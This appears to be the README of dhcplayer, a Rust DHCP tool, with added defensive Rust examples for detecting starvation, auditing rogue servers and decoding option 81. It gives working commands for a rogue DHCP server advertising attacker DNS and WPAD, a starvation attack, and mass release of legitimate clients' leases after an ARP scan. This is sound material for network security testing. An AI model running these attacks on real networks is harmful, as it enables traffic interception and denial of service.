10 releases

| Version | Date |
|---|---|
| 0.1.9 | Nov 28, 2023 |
| 0.1.8 | Mar 17, 2023 |
| 0.1.4 | May 27, 2021 |
DHCPlayer
dhcplayer is a tool to perform several actions using the DHCP protocol, both as a client and as a server. It lets you make simple DHCP requests, but also carry out some well-known attacks such as DHCP starvation or running a rogue DHCP server.
In order to run dhcplayer, you need root privileges to be able to create raw sockets.
Installation
To install:
$ cargo install dhcplayer
DHCP Server
You can create a DHCP server with the server command. Its parameters let you configure the following options:
- Available IP Range
- Broadcast Address
- Network Mask
- Router/Gateway IP (by default your IP)
- DNS server IP(s) (by default your IP)
- WPAD file (disabled by default)
- NetBIOS/WINS name server (disabled by default)
$ sudo dhcplayer server -I eth0 -v --dns 192.168.122.5 --wpad http://wpadserver.local/wpad.dat --netbios 192.168.122.4 --start-ip 192.168.122.60 --end-ip 192.168.122.70
INFO - IP pool: 192.168.122.61-192.168.122.69
INFO - Mask: 255.255.255.0
INFO - Broadcast: 192.168.122.70
INFO - DHCP: 192.168.122.81
INFO - DNS: [192.168.122.5]
INFO - Router: [192.168.122.81]
INFO - Netbios: [192.168.122.4]
INFO - WPAD: http://wpadserver.local/wpad.dat
INFO - DISCOVER from 52:54:00:97:9a:b7
INFO - Offer 192.168.122.69
INFO - REQUEST from 52:54:00:97:9a:b7
INFO - Requested IP 192.168.122.69
INFO - ACK to 192.168.122.69 for 52:54:00:97:9a:b7
Starvation Attack
You can launch a DHCP starvation attack against DHCP servers with the starv command.
The starv command will request all the available IP addresses offered by the DHCP servers in the network. If you only want to target specific servers, use the --server parameter.
$ sudo dhcplayer starv -I eth0 --server 192.168.122.1
192.168.122.80 90:25:4f:b0:51:04
192.168.122.118 eb:a3:fd:f4:26:d5
192.168.122.134 c6:f3:bd:ae:d9:ae
...
To stop the attack you need to press Ctrl-C. When the attack is stopped, all the acquired IPs are released by default. In case you don't want to release them, you can use the -n/--no-release flag.
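From the defender's side, the server log lines shown above ("DISCOVER from <mac>") are enough to spot a starvation run: a burst of never-before-seen client MACs in a short window. The following is an added example, not part of dhcplayer; it assumes a seconds timestamp has been prepended to each line and uses a constructed log.

```rust
use std::collections::{HashSet, VecDeque};
/// Keep only the first DISCOVER of each client MAC, as (timestamp, mac).
pub fn first_seen_macs(log: &str) -> Vec<(u64, String)> {
    let mut seen = HashSet::new();
    let mut out = Vec::new();
    for line in log.lines() {
        // expected shape: "<seconds> INFO - DISCOVER from <mac>"
        let words: Vec<&str> = line.split_whitespace().collect();
        let ts = match words.first().and_then(|t| t.parse::<u64>().ok()) { Some(t) => t, None => continue };
        if let Some(pos) = words.iter().position(|w| *w == "DISCOVER") {
            if let Some(mac) = words.get(pos + 2) {
                if seen.insert(mac.to_string()) { out.push((ts, mac.to_string())); }
            }
        }
    }
    out
}
/// Timestamp at which more than `max_new` new MACs fell inside `window` seconds, or None.
pub fn starvation_alert(events: &[(u64, String)], window: u64, max_new: usize) -> Option<u64> {
    let mut recent: VecDeque<u64> = VecDeque::new();
    for (ts, _) in events {
        recent.push_back(*ts);
        // drop timestamps that fell out of the sliding window
        while recent.front().map_or(false, |old| ts - old >= window) {
            recent.pop_front();
        }
        if recent.len() > max_new {
            return Some(*ts);
        }
    }
    None
}
// Constructed log: two ordinary clients, then a burst of new MACs within a few seconds.
pub const LOG: &str = "0 INFO - DISCOVER from 52:54:00:97:9a:b7
0 INFO - REQUEST from 52:54:00:97:9a:b7
30 INFO - DISCOVER from 52:54:00:12:34:56
100 INFO - DISCOVER from 02:00:00:00:00:01
101 INFO - DISCOVER from 02:00:00:00:00:02
101 INFO - DISCOVER from 02:00:00:00:00:01
102 INFO - DISCOVER from 02:00:00:00:00:03
103 INFO - DISCOVER from 02:00:00:00:00:04
104 INFO - DISCOVER from 02:00:00:00:00:05";

fn main() {
    match starvation_alert(&first_seen_macs(LOG), 10, 4) {
        Some(ts) => println!("possible DHCP starvation at t={}s", ts),
        None => println!("no starvation pattern"),
    }
}
```

The thresholds (10 seconds, 4 new clients) are assumptions to tune per network; on a switch with DHCP snooping the same signal is available as the per-port rate limit counter.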
Discover
The discover command allows you to discover and request the IPs available from a DHCP server.
In its most basic use the command will request an IP from any DHCP server. If you want to request from a specific server, you can use the --server parameter.
$ sudo dhcplayer discover -I eth0
ACK received from 192.168.122.81
Acquired IP: 192.168.122.67
Client MAC: 52:54:00:97:9a:b7
Options:
[54] DHCP Server ID: 192.168.122.81
[51] IP Address Lease Time: 3600
[58] Renewal Time: 1800
[59] Rebinding Time: 3150
[1] Subnet Mask: 255.255.255.0
[28] Broadcast Address: 192.168.122.70
[3] Router: 192.168.122.81
[6] Domain Server: 192.168.122.5
Discover DHCP servers
Moreover, you can send DISCOVER messages without requesting the IP addresses, using the -n/--no-request flag. In that case, dhcplayer will listen for all the offers made by all the DHCP servers, if there is more than one in the network.
It can be useful to specify --options all to request all the information from a DHCP server.
$ sudo dhcplayer discover -I eth0 -n --options all
OFFER received from 192.168.122.1
Offered IP: 192.168.122.82
Client MAC: 52:54:00:97:9a:b7
DHCP Server: 192.168.122.1
Options:
[54] DHCP Server ID: 192.168.122.1
[51] IP Address Lease Time: 3600
[58] Renewal Time: 1800
[59] Rebinding Time: 3150
[1] Subnet Mask: 255.255.255.0
[28] Broadcast Address: 192.168.122.255
[3] Router: 192.168.122.1
[6] Domain Server: 192.168.122.1
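Listening for every OFFER is also how you audit a segment for rogue servers: any OFFER whose server is not on the allow-list, or that hands out an unexpected router or DNS, is a finding. The following is an added example, not part of dhcplayer; it parses the output format printed above from a constructed capture and assumes the allow-list and expected values given in main.

```rust
use std::collections::HashSet;
#[derive(Debug, Default, PartialEq)]
pub struct Offer { pub server: String, pub ip: String, pub router: String, pub dns: String }
/// Split the printed output into one Offer per "OFFER received from" block.
pub fn parse_offers(text: &str) -> Vec<Offer> {
    let mut offers = Vec::new();
    for line in text.lines().map(str::trim) {
        if let Some(s) = line.strip_prefix("OFFER received from ") {
            offers.push(Offer { server: s.to_string(), ..Default::default() });
        } else if let Some(cur) = offers.last_mut() {
            if let Some(v) = line.strip_prefix("Offered IP: ") { cur.ip = v.into(); }
            else if let Some(v) = line.strip_prefix("[3] Router: ") { cur.router = v.into(); }
            else if let Some(v) = line.strip_prefix("[6] Domain Server: ") { cur.dns = v.into(); }
        }
    }
    offers
}
/// One finding per deviation from site policy: unknown server, or unexpected router/DNS.
pub fn audit(offers: &[Offer], allowed: &HashSet<&str>, router: &str, dns: &str) -> Vec<String> {
    let mut findings = Vec::new();
    for o in offers {
        if !allowed.contains(o.server.as_str()) {
            findings.push(format!("unauthorized DHCP server {} offered {}", o.server, o.ip));
        }
        if o.router != router {
            findings.push(format!("{} offers router {} (expected {})", o.server, o.router, router));
        }
        if o.dns != dns {
            findings.push(format!("{} offers DNS {} (expected {})", o.server, o.dns, dns));
        }
    }
    findings
}

// Constructed capture: two servers answer one DISCOVER, the second handing out itself as router.
pub const CAPTURE: &str = "OFFER received from 192.168.122.1
Offered IP: 192.168.122.82
[3] Router: 192.168.122.1
[6] Domain Server: 192.168.122.1
OFFER received from 192.168.122.81
Offered IP: 192.168.122.69
[3] Router: 192.168.122.81
[6] Domain Server: 192.168.122.5";
fn main() {
    let allowed: HashSet<&str> = ["192.168.122.1"].iter().copied().collect();
    for f in audit(&parse_offers(CAPTURE), &allowed, "192.168.122.1", "192.168.122.1") {
        println!("ALERT: {}", f);
    }
}
```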
DNS Dynamic Update
You can ask the DHCP server to create a new DNS A record with the --dns-update flag, based on either the hostname (-H/--hostname) or the FQDN (Fully Qualified Domain Name, --fqdn). If you specify neither hostname nor FQDN, the DNS record will be deleted.
The server should return the server-update flag in the Client FQDN option (81) if the update was successful.
sudo dhcplayer discover -I eth2 --dns-update -H test # Update based on hostname
sudo dhcplayer discover -I eth2 --dns-update --fqdn test.contoso.local # Update based on fqdn
sudo dhcplayer discover -I eth2 --dns-update # Delete DNS record
$ sudo dhcplayer discover -I eth2 --dns-update -H test
ACK received from 0.0.0.0
Acquired IP: 192.168.100.3
Client MAC: 52:54:00:88:80:0c
Options:
[58] Renewal Time: 345600
[59] Rebinding Time: 604800
[51] IP Address Lease Time: 691200
[54] DHCP Server ID: 192.168.100.2
[1] Subnet Mask: 255.255.255.0
[81] Client FQDN: flags: 0x1 (server-update) A-result: 255 PTR-result: 0
[3] Router: 192.168.100.2
[15] Domain Name: contoso.local
[6] Domain Server: 192.168.100.2
$ nslookup test.contoso.local 192.168.100.2
Server: 192.168.100.2
Address: 192.168.100.2#53
Name: test.contoso.local
Address: 192.168.100.3
$ sudo dhcplayer discover -I eth2 --dns-update
ACK received from 0.0.0.0
Acquired IP: 192.168.100.3
Client MAC: 52:54:00:88:80:0c
Options:
[58] Renewal Time: 345600
[59] Rebinding Time: 604800
[51] IP Address Lease Time: 691200
[54] DHCP Server ID: 192.168.100.2
[1] Subnet Mask: 255.255.255.0
[81] Client FQDN: flags: 0x1 (server-update) A-result: 255 PTR-result: 0
[3] Router: 192.168.100.2
[15] Domain Name: contoso.local
[6] Domain Server: 192.168.100.2
$ nslookup test.contoso.local 192.168.100.2
Server: 192.168.100.2
Address: 192.168.100.2#53
** server can't find test.contoso.local: NXDOMAIN
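The "[81] Client FQDN: flags: 0x1 (server-update) A-result: 255 PTR-result: 0" line above is the decoded Client FQDN option from RFC 4702: one flags octet (S=0x1 server-update, O=0x2 override, E=0x4 wire-encoding, N=0x8 no-update), the two deprecated RCODE octets, then the name. The following decoder is an added example, not part of dhcplayer; it handles both name encodings and feeds a constructed ACK payload in the test.

```rust
#[derive(Debug, PartialEq)]
pub struct ClientFqdn {
    pub flags: u8,
    pub a_result: u8,   // RCODE1: deprecated A-record result code
    pub ptr_result: u8, // RCODE2: deprecated PTR-record result code
    pub name: String,
}

impl ClientFqdn {
    /// Parse the option payload (the bytes after the code and length octets).
    pub fn parse(payload: &[u8]) -> Result<Self, String> {
        if payload.len() < 3 {
            return Err("option 81 needs at least 3 bytes".into());
        }
        let flags = payload[0];
        let body = &payload[3..];
        let name = if flags & 0x4 != 0 {
            decode_wire_name(body)? // E bit set: RFC 1035 label sequence
        } else {
            // E bit clear: deprecated ASCII encoding, a plain dotted name
            String::from_utf8(body.to_vec()).map_err(|e| e.to_string())?
        };
        Ok(ClientFqdn { flags, a_result: payload[1], ptr_result: payload[2], name })
    }
    /// Flag names per RFC 4702: S=server-update, O=override, E=wire-encoding, N=no-update.
    pub fn flag_names(&self) -> Vec<&'static str> {
        let table: [(u8, &'static str); 4] = [(0x1, "server-update"), (0x2, "override"), (0x4, "wire-encoding"), (0x8, "no-update")];
        table.iter().filter(|(b, _)| self.flags & b != 0).map(|(_, n)| *n).collect()
    }
    /// One-line summary in the same shape as the dhcplayer output above.
    pub fn summary(&self) -> String {
        format!("flags: {:#x} ({}) A-result: {} PTR-result: {} name: {}",
            self.flags, self.flag_names().join(","), self.a_result, self.ptr_result, self.name)
    }
}

/// Decode RFC 1035 labels; a missing terminating zero label is allowed (partial name).
fn decode_wire_name(mut b: &[u8]) -> Result<String, String> {
    let mut labels = Vec::new();
    while let Some((&len, rest)) = b.split_first() {
        let len = len as usize;
        if len == 0 { break; }
        if len > 63 || len > rest.len() { return Err("bad label length".into()); }
        labels.push(String::from_utf8_lossy(&rest[..len]).into_owned());
        b = &rest[len..];
    }
    Ok(labels.join("."))
}
```

When auditing dynamic updates, an ACK whose flags lack the S bit, or one that carries N, means the server declined the update and the name in DNS cannot be trusted to match the lease.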
Inform
Additionally, you can send an INFORM request instead of a DISCOVER by using the -i/--inform flag of the discover command.
$ sudo dhcplayer discover -I eth0 -i --options wpad,dns --server 192.168.122.1 -v
INFO - INFORM sent - Client MAC 52:54:00:97:9a:b7
ACK received from 192.168.122.1
Acquired IP: 0.0.0.0
Client MAC: 52:54:00:97:9a:b7
Options:
[54] DHCP Server ID: 192.168.122.1
[1] Subnet Mask: 255.255.255.0
[28] Broadcast Address: 192.168.122.255
[6] Domain Server: 192.168.122.1
Release
You can use the release command to release IPs that were acquired by you or by another peer. For this you need to specify the IP and the MAC address of the client you want to release.
You can specify the IP/MAC pairs in the format <ip>-<mac>. You can give the pairs on the command line, or pass them through a file or stdin.
$ sudo dhcplayer release -I eth2 --server 192.168.100.2 192.168.100.5-ca:2b:d1:21:17:86 192.168.100.7-fe:38:4e:46:95:d6 -v
INFO - RELEASE 192.168.100.5 ca:2b:d1:21:17:86
INFO - RELEASE 192.168.100.7 fe:38:4e:46:95:d6
You can also combine this command with an ARP scan to release the IPs of legitimate clients. The released clients will probably keep using their IPs, but those addresses are now free to be assigned to another peer, which may cause problems in the network.
$ sudo arplayer scan -I eth2 -w 10 | sudo dhcplayer release -I eth2 --server 192.168.100.2 -v
INFO - RELEASE 192.168.100.1 52:54:00:5b:49:5d
INFO - RELEASE 192.168.100.2 52:54:00:0b:75:57
INFO - RELEASE 192.168.100.7 52:54:00:a4:8c:f2
INFO - RELEASE 192.168.100.5 52:54:00:76:87:bb
Disclaimer
Please don't use this tool for bad things. I won't assume any responsibility for your actions with this tool.